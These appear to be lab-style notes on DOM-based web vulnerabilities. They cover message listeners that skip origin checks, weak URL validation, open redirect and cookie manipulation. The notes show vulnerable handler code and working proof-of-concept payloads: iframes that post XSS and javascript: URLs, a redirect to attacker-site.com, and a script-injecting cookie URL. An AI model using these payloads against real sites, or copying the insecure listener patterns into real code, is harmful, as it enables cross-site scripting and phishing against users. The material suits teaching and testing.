If a website handles web message in an unsafe way, e.g. by not verifying the origin, code in the event listener become potential sinks.
Example 1 (no validation)
<script>
window.addEventListener('message', function(e) {
document.getElementById('name').innerHTML = e.data;
})
</script>
<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('<img src=x onerror=print()>','*')">
Example 2 (broken URL validation)
<script>
window.addEventListener('message', function(e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
location.href = url;
}
}, false);
</script>
<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('javascript:print()//https:','*')">
<a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1]; else location.href = "/"'>Back</a>
https://vulnerable-website.com/?url=https://attacker-site.com
<a href='https://website.com/product?productId=2'>Last viewed product</a>
<script>
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>
<iframe src="https://website.com/product?productId=2#'><script>print()</script>"></iframe>
Other DOM-based vulnerabilities
